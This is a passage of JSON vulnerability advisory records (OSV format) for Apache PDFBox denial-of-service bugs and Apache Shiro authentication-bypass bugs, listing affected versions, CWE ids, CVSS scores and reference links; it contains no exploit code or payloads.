"ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.12" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-gx96-vgf7-hwfg/GHSA-gx96-vgf7-hwfg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11797" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-gx96-vgf7-hwfg" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/645574bc50b886d39c20b4065d51ccb1cd5d3a6b4750a22edbb565eb@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a9760973a873522f4d4c0a99916ceb74f361d91006b663a0a418d34a@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00008.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:16Z", "nvd_published_at": "2018-10-05T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j2xq-pfff-mvgg", "published": "2022-05-13T01:53:29Z", "modified": "2024-02-20T05:34:40.059516Z", "aliases": [ "CVE-2018-8036" ], "summary": "Loop with Unreachable Exit Condition in Apache PDFBox", "details": "In Apache PDFBox 1.8.0 to 1.8.14 and 2.0.0RC1 to 2.0.10, a carefully crafted (or fuzzed) file can trigger an infinite loop which leads to an out of memory exception in Apache PDFBox's AFMParser.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.8.15" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.12", "1.8.13", "1.8.14", 
"1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.8.14", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j2xq-pfff-mvgg/GHSA-j2xq-pfff-mvgg.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0RC1" }, { "fixed": "2.0.11" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.10", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.10", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j2xq-pfff-mvgg/GHSA-j2xq-pfff-mvgg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8036" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9f62f742fd4fcd81654a9533b8a71349b064250840592bcd502dcfb6@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T18:54:14Z", "nvd_published_at": "2018-07-03T20:29:00Z", "severity": "MODERATE" }, "severity": [ 
{ "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7grw-6pjh-jpc9", "published": "2021-06-15T15:54:29Z", "modified": "2024-03-08T05:18:50.960251Z", "aliases": [ "CVE-2021-31812" ], "summary": "Infinite Loop in Apache PDFBox", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31812" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": 
"WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf251f6c358087107f8c23473468b279d59d50a75db6b4768165c78d3@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:41:33Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fg3j-q579-v8x4", "published": "2021-06-15T15:54:32Z", "modified": "2024-03-08T05:34:54.801835Z", "aliases": [ "CVE-2021-31811" ], "summary": "Uncontrolled memory consumption", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", 
"2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31811" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/2" } ], "database_specific": { "cwe_ids": [ "CWE-770", "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:39:19Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-26gr-cvq3-qxgf", "published": "2021-05-07T15:53:18Z", "modified": "2023-11-08T04:02:47.183256Z", "aliases": [ "CVE-2020-1957" ], "summary": "Improper Authentication in Apache Shiro", "details": "Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1" ], "database_specific": { 
"source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-26gr-cvq3-qxgf/GHSA-26gr-cvq3-qxgf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1957" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:05:12Z", "nvd_published_at": "2020-03-25T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2vgm-wxr3-6w2j", "published": "2021-05-07T15:54:23Z", "modified": "2024-03-15T05:20:51.873553Z", "aliases": [ "CVE-2020-13933" ], "summary": "Authentication bypass in Apache Shiro", "details": "Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.", "affected": [ { 
"package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2vgm-wxr3-6w2j/GHSA-2vgm-wxr3-6w2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13933" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-05T21:37:50Z", "nvd_published_at": "2020-08-17T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-45x9-q6vj-cqgq", "published": "2022-10-12T12:00:16Z", "modified": "2024-02-16T07:57:10.787044Z", "aliases": [ "CVE-2022-40664" ], "summary": "Apache Shiro Authentication Bypass vulnerability", "details": "Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", 
"purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.10.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-45x9-q6vj-cqgq/GHSA-45x9-q6vj-cqgq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40664" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221118-0005" }, { "type": "WEB", "url": "https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/12/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/12/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-10-12T19:43:15Z", "nvd_published_at": "2022-10-12T07:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4cf5-xmhp-3xj7", "published": "2022-06-30T00:00:41Z", "modified": "2023-11-08T04:09:36.762135Z", "aliases": [ "CVE-2022-32532" ], "summary": "Improper Authorization in Apache Shiro", "details": "Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. 
Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-4cf5-xmhp-3xj7/GHSA-4cf5-xmhp-3xj7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32532" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh" } ], "database_specific": { "cwe_ids": [ "CWE-285", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:52:31Z", "nvd_published_at": "2022-06-29T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72w9-fcj5-3fcg", "published": "2021-05-07T15:53:10Z", "modified": "2023-11-08T04:02:08.916630Z", "aliases": [ "CVE-2020-11989" ], "summary": "Improper Authentication in Apache Shiro", "details": "Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. 
Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.3" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-72w9-fcj5-3fcg/GHSA-72w9-fcj5-3fcg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11989" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E" 
